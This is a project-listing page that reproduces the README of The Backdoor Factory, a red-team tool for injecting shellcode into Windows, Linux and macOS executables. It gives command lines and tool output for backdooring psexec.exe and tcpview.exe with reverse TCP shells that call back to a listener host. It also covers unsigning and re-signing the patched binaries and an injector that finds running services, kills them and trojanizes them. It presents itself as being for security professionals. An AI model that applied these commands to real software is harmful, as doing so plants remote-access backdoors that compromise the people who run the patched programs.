All Projects → secretsquirrel → The Backdoor Factory

secretsquirrel / The Backdoor Factory

Licence: bsd-3-clause
Patch PE, ELF, Mach-O binaries with shellcode new version in development, available only to sponsors

Programming Languages

python
116272 projects - #7 most used programming language
c
41328 projects - #5 most used programming language
assembly
4007 projects
HTML
56500 projects
javascript
154013 projects - #8 most used programming language
shell
60597 projects

Projects that are alternatives of or similar to The Backdoor Factory

HatVenom
HatVenom is a HatSploit native powerful payload generation tool that provides support for all common platforms and architectures.
Stars: ✭ 84 (-97.11%)
Mutual labels:  elf, macho, pe
Lief
Authors
Stars: ✭ 2,730 (-5.99%)
Mutual labels:  elf, pe, macho
byteripper
A tool to extract code from individual functions in a library.
Stars: ✭ 14 (-99.52%)
Mutual labels:  elf, macho
dwex
DWARF Explorer - a GUI utility for navigating the DWARF debug information
Stars: ✭ 58 (-98%)
Mutual labels:  elf, macho
Android Disassembler
Disassemble ANY files including .so (NDK, JNI), Windows PE(EXE, DLL, SYS, etc), linux binaries, libraries, and any other files such as pictures, audios, etc(for fun)files on Android. Capstone-based disassembler application on android. 안드로이드 NDK 공유 라이브러리, Windows 바이너리, etc,... 리버싱 앱
Stars: ✭ 250 (-91.39%)
Mutual labels:  capstone, elf
Checksec.py
Checksec tool in Python, Rich output. Based on LIEF
Stars: ✭ 188 (-93.53%)
Mutual labels:  elf, pe
ftrace
Simple Function calls tracer
Stars: ✭ 65 (-97.76%)
Mutual labels:  capstone, elf
Detect It Easy
Program for determining types of files for Windows, Linux and MacOS.
Stars: ✭ 2,982 (+2.69%)
Mutual labels:  elf, macho
Rop Tool
A tool to help you write binary exploits
Stars: ✭ 590 (-79.68%)
Mutual labels:  elf, pe
Dissection
The dissection of a simple "hello world" ELF binary.
Stars: ✭ 427 (-85.3%)
Mutual labels:  elf, pe
Automated-Malware-Analysis-List
My personal Automated Malware Analysis Sandboxes and Services
Stars: ✭ 20 (-99.31%)
Mutual labels:  elf, pe
Filebytes
Library to read and edit files in the following formats: Executable and Linking Format (ELF), Portable Executable (PE), MachO and OAT (Android Runtime)
Stars: ✭ 105 (-96.38%)
Mutual labels:  elf, pe
Goblin
An impish, cross-platform binary parsing crate, written in Rust
Stars: ✭ 591 (-79.65%)
Mutual labels:  elf, pe
Cave miner
Search for code cave in all binaries
Stars: ✭ 218 (-92.49%)
Mutual labels:  elf, pe
Xhook
🔥 A PLT hook library for Android native ELF.
Stars: ✭ 2,996 (+3.17%)
Mutual labels:  elf
Faerie
Magical ELF and Mach-o object file writer backend
Stars: ✭ 187 (-93.56%)
Mutual labels:  elf
Elfparser
Cross Platform ELF analysis
Stars: ✭ 228 (-92.15%)
Mutual labels:  elf
Chain Reactor
Chain Reactor is an open source framework for composing executables that simulate adversary behaviors and techniques on Linux endpoints.
Stars: ✭ 206 (-92.91%)
Mutual labels:  elf
Elfkit
rust elf parsing, manipulation and (re)linking toolkit
Stars: ✭ 180 (-93.8%)
Mutual labels:  elf
Geyser
A bridge/proxy allowing you to connect to Minecraft: Java Edition servers with Minecraft: Bedrock Edition.
Stars: ✭ 2,851 (-1.83%)
Mutual labels:  pe

The new version of BACKDOOR FACTORY is available! Get access here: https://github.com/sponsors/secretsquirrel

The Backdoor Factory (BDF)

For security professionals and researchers only.

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

Join the chat at https://gitter.im/secretsquirrel/the-backdoor-factory Black Hat Arsenal

Black Hat USA 2015:

Video: https://www.youtube.com/watch?v=OuyLzkG16Uk

Paper: https://www.blackhat.com/docs/us-15/materials/us-15-Pitts-Repurposing-OnionDuke-A-Single-Case-Study-Around-Reusing-Nation-State-Malware-wp.pdf

Shmoocon 2015:

Video: https://archive.org/details/joshpitts_shmoocon2015

Paper: https://www.dropbox.com/s/te7e35c8xcnyfzb/JoshPitts-UserlandPersistenceOnMacOSX.pdf

DerbyCon 2014:

Video: http://www.youtube.com/watch?v=LjUN9MACaTs

DerbyCon 2013:

Video: http://www.youtube.com/watch?v=jXLb2RNX5xs

Injection Module Demo: http://www.youtube.com/watch?v=04aJAex2o3U

Slides: http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory

Contact the developer on:

IRC:
irc.freenode.net #BDFactory 

Twitter:
@midnite_runr

Under a BSD 3 Clause License

See the wiki: https://github.com/secretsquirrel/the-backdoor-factory/wiki


Installing

DOCKER

docker pull secretsquirrel/the-backdoor-factory
docker run -it secretsquirrel/the-backdoor-factory bash
# ./backdoor.py

###OLD SCHOOL

####Dependences #####To use OnionDuke you MUST be on an intel machine because aPLib has no support for the ARM chipset yet.

Capstone engine can be installed from PyPi with:

sudo pip install capstone

Pefile, most recent:

https://code.google.com/p/pefile/

osslsigncode (included in repo):

http://sourceforge.net/p/osslsigncode/osslsigncode/ci/master/tree/

Kali Install:

  apt-get update
  apt-get install backdoor-factory

Other *NIX/MAC INSTALL:

./install.sh

This will install Capstone with 3.01 pip to install pefile.

UPDATE:

./update.sh

Supporting:

Windows PE x86/x64,ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32), 
and Mach-O x86/x64 and those formats in FAT files

Packed Files: PE UPX x86/x64

Experimental: OpenBSD x32 

Some executables have built in protections, as such this will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises. I'm on the verge of bypassing NSIS, so bypassing these checks will be included in the future.

Many thanks to Ryan O'Neill --ryan 'at' codeslum <d ot> org--
Without him, I would still be trying to do stupid things 
with the elf format.
Also thanks to Silvio Cesare with his 1998 paper 
(http://vxheaven.org/lib/vsc01.html) which these ELF patching
techniques are based on.

Recently tested on many binaries.

./backdoor.py -h Usage: backdoor.py [options]


##Features:

###PE Files

Can find all codecaves in an EXE/DLL.
By default, clears the pointer to the PE certificate table, thereby unsigning a binary.
Can inject shellcode into code caves or into a new section.
Can find if a PE binary needs to run with elevated privileges.
When selecting code caves, you can use the following commands:
  -Jump (j), for code cave jumping
  -Single (s), for patching all your shellcode into one cave
  -Append (a), for creating a code cave
  -Ignore (i or q), nevermind, ignore this binary
Can ignore DLLs
Import Table Patching
AutoPatching (-m automtic)
Onionduke (-m onionduke)

###ELF Files

Extends 1000 bytes (in bytes) to the TEXT SEGMENT and injects shellcode into that section of code.

###Mach-O Files Pre-Text Section patching and signature removal

###Overall

The user can :
  -Provide custom shellcode.
  -Patch a directory of executables/dlls.
  -Select x32 or x64 binaries to patch only.
  -Include BDF is other python projects see pebin.py and elfbin.py

Sample Usage:

###Patch an exe/dll using an existing code cave:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp 

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 402
[*] All caves lengths:  (402,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 402
[*] Available caves:
1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507
2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492
3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501
4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492
5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505
6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498
7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495
8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505
9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559
10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559
**************************************************
[!] Enter your selection: 5
Using selection: 5
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

###Patch an exe/dll by adding a code section:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a 
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Creating Code Cave
- Adding a new section to the exe/dll for shellcode injection
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

###Patch a directory of exes: ./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a ...output too long for README...


###User supplied shellcode: msfpayload windows/exec CMD='calc.exe' R > calc.bin ./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.


###PEcodeSigning

BDF can sign PE files if you have a codesigning cert. It uses osslsigncode. Put your signing cert and private key in the certs/ directory. Prep your certs using openssl commands from this blog post: http://secureallthethings.blogspot.com/2015/12/add-pe-code-signing-to-backdoor-factory.html

Put your private key password in a file (gasp) as so (exactly as so):

echo -n yourpassword > certs/passFile.txt

Name your certs EXACTLY as follows:

signingCert.cer => certs/signingCert.cer
signingPrivateKey.pem => certs/signingPrivateKey.pem

Your certs/ directory should look excatly as so:

certs
├── passFile.txt
├── signingPrivateKey.pem
└── signingCert.cer

Enable PE Code Signing with the -C flag as so:

 ./backdoor.py -f tcpview.exe -s iat_reverse_tcp_inline -H 172.16.186.1 -P 8080 -m automatic -C

On successful run you should see this line in BDF output:

[*] Code Signing Succeeded

###Hunt and backdoor: Injector | Windows Only The injector module will look for target executables to backdoor on disk. It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.
Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.

./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow 

###Changelog

####01/11/2016

  • Fix entry point truncation bug that led to improper recovery in rare instances

####07/04/2016

  • Support for dynamic paths in BDFProxy for preprocessor

####06/19/2016

  • Added the preprocessor and other optimizations
  • The preprocessor allows the user to modify the binary prior to payload injection
  • Invoke with the -p flag
  • See samples in ./preprocessor/

####12/20/2015

  • Added directory paths to BDF to find certs directory.

####12/18/2015

####11/17/2015

  • Bug fix in rsrc section for onionduke patching and remove of random win32 version value in PE Header

####11/13/2015

  • Added proper truncating of a PE file after signature pointer is cleared in PE header - e.g. proper unsigning. Resulting in better support for IAT patching

####10/19/2015

  • Fixed bug in IAT directory cave assignment that caused BDF crash
  • Made the feature optional with -A flag

####10/13/2015

  • Changed the Import Table Directory modifications from adding a new section to using an existing code cave

####08/12/2015

  • Added 'replace' PATCH_METHOD - a straight PE copy pasta of the supplied binary

  • More for usage with BDFProxy

    Usage: ./backdoor.py -f weee.exe -m replace -b supplied_binary.exe

####08/11/2015

  • Stability fix for auto cave selection for rare caves of overlap

####08/05/2015

  • BH USA UPDATES, w00t!
  • OnionDuke, use -m onionduke * Supports user supplied exe's and dll's * Usage: ./backdoor.py -f originalfile.exe -m onionduke -b pentest.dll/exe
  • XP MODE = Prior IAT based payloads did not support XP, Wine, or Windows 98. If you need to support XP use the -X flag. I'm not supporting anything less than XP (and not XP x64).
  • Invoke UAC prompt to runas as admin. experimental - patches the PE manifest if requestedExecutionLevel exists.
  • Stability updates: * Fixed a bug with incorrect RVA calculation jmp'ing across 2+ code caves * Better checks to determine if a new section for the IAT will write into appended data and therefore fail
  • Speed Improvements: * Faster code cave finding while using automatic mode (-m automatic) * Faster rsrc parsing to find manifest file

####5/01/2015

  • Bug fix to the reverse_tcp_stager_threaded payload when using single caves payload

####4/28/2015

  • Adding check for Bound Imports (PE files with bound imports will not be patched)

####4/14/2015

So many updates:

####2/14/2015 I <3 you guys

  • Added Import Address Table patching for PEs to support iat_reverse_tcp payloads that use the import table for winAPI calls. If the binary you are patching does not have LoadLibraryA and GetProcAddress, for example, BDF will patch it in to a new Import Table in a new section. Supports x64/x86 PEs.

  • Added iat_reverse_tcp for x64 PEs.

  • Bug fixes and improvements

####1/1/2015

Happy New Year!

Two new OS X payloads! The delay: delay_reverse_shell_tcp

-B 30 --> delay the payload for 30 seconds, main code runs right away.

Setting of firm capstone commit for building into BDF, capstone 'Next' repo breaks BDF.

Fixes to support cython capstone implementation null byte truncation issue

####12/27/2014

Added payloadtests.py

This script will output patched files in backdoored that will allow for the user to test the payloads as they wish. Each payload type increments the port used by one.

Usage: payloadtest.py binary HOST PORT

####12/17/2014

OS X Beaconing Payloads for x86 and x64: beaconing_reverse_shell_tcp

-B 15 --> set beacon time for 15 secs

Bug fix to support OS X for BDFProxy

####10/11/2014

PE UPX Patching Added

####9/26/2014

Mach-O x86/x64 added

x86 IAT payload optimization

####7/31/2014

Added support for ARM x32 LE ELF patching

####7/22/2014

Added FreeBSD x32 ELF patching support

Change to BSD 3 Clause License

####7/13/2014

Incorporated Capstone: http://www.capstone-engine.org/

During the process of adding Capstone, I removed about 500 lines of code. That's pretty awesome.

Renamed loadliba_reverse_tcp to iat_reverse_tcp.

Small optimizations for speed.

####5/30/2014

Added a new win86 shellcode: loadliba_reverse_tcp


Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected]